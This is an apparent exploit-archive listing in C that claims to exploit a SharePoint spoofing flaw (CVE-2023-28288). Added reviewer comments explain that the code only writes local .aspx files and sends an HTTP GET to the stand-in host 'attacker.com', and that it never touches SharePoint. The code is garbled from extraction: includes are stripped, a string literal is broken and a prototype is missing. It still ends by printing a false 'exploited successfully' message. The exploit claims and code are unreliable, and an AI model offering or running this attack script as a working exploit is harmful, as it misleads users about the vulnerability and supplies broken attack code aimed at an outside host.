// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288
//
// Reviewer summary -- what the listing below actually does, as visible here:
//   1. writes a small file named by fake_file_name into the working directory;
//   2. creates a second local file named by file_name and tries to fill it with
//      the body of one HTTP GET issued through WinINet (see InternetReadFileUrl);
//   3. deletes that second file and renames the first one over it;
//   4. issues the same GET again, discards the body, and prints a success line.
// Nothing in it touches a SharePoint-specific endpoint, header or token, so as
// far as this listing shows it does not demonstrate the spoofing issue named
// above; on an endpoint it amounts to two new .aspx files in the working
// directory plus an outbound HTTP attempt toward the host in fake_url.
// The Win32/WinINet calls are Windows-only despite the "Windows/Linux" line,
// and the code is not buildable as extracted (see the notes on the includes
// and on the literal in main).

// NOTE(review): the header names were lost in extraction (the angle-bracketed
// names read as markup and were stripped). The Win32 and WinINet calls below
// presumably came from <windows.h> and <wininet.h>; printf/sprintf/strlen also
// need <stdio.h> and <string.h>. Confirm against the original listing.
#include
#include

// The vulnerable SharePoint server URL
// (only ever used as the prefix of the string handed to InternetReadFileUrl;
// the program never connects to this host)
const char *server_url = "http://example.com/";
// The URL of the fake SharePoint server
// (passed to InternetConnect as the server-name argument -- this is the only
// host the program tries to reach)
const char *fake_url = "http://attacker.com/";
// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";
// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

// Entry point. Returns 0 after the final GET "succeeds", 1 on the first
// failing Win32/WinINet call. Every error path prints GetLastError() with %d;
// GetLastError() returns DWORD (unsigned long), so %lu is the matching
// conversion -- the same mismatch repeats on every printf in this function.
int main() {
    HANDLE file;
    DWORD bytes_written;
    // Reused for three different things: the fake file body, then two URLs.
    // Both sprintf calls are unbounded; the fixed globals fit in 1024 bytes,
    // but nothing checks that.
    char file_contents[1024];

    // Create the fake file contents
    // NOTE(review): this literal spans lines as extracted, which is not valid
    // C; the surrounding markup was most likely stripped by the page renderer
    // and has to be restored from the original listing before this compiles.
    sprintf(file_contents, "

This is a fake file.

");
    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
                      FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE) {
        printf("Error creating fake file: %d\n", GetLastError());
        return 1;
    }
    // strlen returns size_t; WriteFile takes a DWORD count (implicit narrowing).
    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL)) {
        printf("Error writing fake file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Send a request to the vulnerable SharePoint server to download the file
    // file_contents now holds server_url + file_name, an absolute URL that
    // InternetReadFileUrl passes straight through as the request object name.
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
                      FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE) {
        printf("Error creating vulnerable file: %d\n", GetLastError());
        return 1;
    }
    // NOTE(review): InternetReadFileUrl is defined after main with no prior
    // prototype; C99 and later reject a call to an undeclared function, so a
    // declaration is needed above main.
    if (!InternetReadFileUrl(file_contents, file)) {
        printf("Error downloading vulnerable file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Replace the vulnerable file with the fake file
    // Both operations act on the local working directory only.
    if (!DeleteFile(file_name)) {
        printf("Error deleting vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name)) {
        printf("Error replacing vulnerable file: %d\n", GetLastError());
        return 1;
    }

    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    // Same URL as before; NULL discards the response body.
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL)) {
        printf("Error triggering vulnerability: %d\n", GetLastError());
        return 1;
    }

    // Print a message indicating that the vulnerability has been exploited
    // (this only means the GET above was sent and the read loop ended; see the
    // return-value note on InternetReadFileUrl)
    printf("Vulnerability exploited successfully.\n");
    return 0;
}

// Perform one HTTP GET through WinINet and optionally copy the body to a file.
//
// url:  passed unchanged as the object name of HttpOpenRequest. Callers hand
//       in an absolute URL (server_url + file_name), while the connection is
//       opened to fake_url, so the requested path and the connected host are
//       unrelated here.
// file: destination handle for the response body, or NULL to discard it.
//
// Returns FALSE when any handle cannot be opened, the request cannot be sent,
// or a WriteFile fails. Returns TRUE once the read loop ends -- including when
// InternetReadFile itself fails, because the loop condition treats a failed
// read the same as end-of-body. Callers read GetLastError() after a FALSE
// return, but the InternetCloseHandle calls made before returning may already
// have changed it.
BOOL InternetReadFileUrl(const char *url, HANDLE file) {
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    char buffer[1024];

    // Open an Internet connection
    // Browser-like user agent; proxy settings come from the system (PRECONFIG).
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
                            INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL) {
        return FALSE;
    }

    // Connect to the server
    // NOTE(review): the second argument is a server name, but fake_url is a
    // full URL with scheme and trailing slash, so this connect is unlikely to
    // resolve as written -- confirm against the original listing.
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT,
                                 NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL) {
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL) {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0)) {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Read the response data
    // A failed InternetReadFile ends the loop silently (see return-value note).
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0) {
        if (file != NULL) {
            // Write the data to disk
            // bytes_read is both the count to write and the bytes-written out
            // parameter, so a short write is not detected; the next iteration
            // overwrites it anyway.
            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL)) {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
}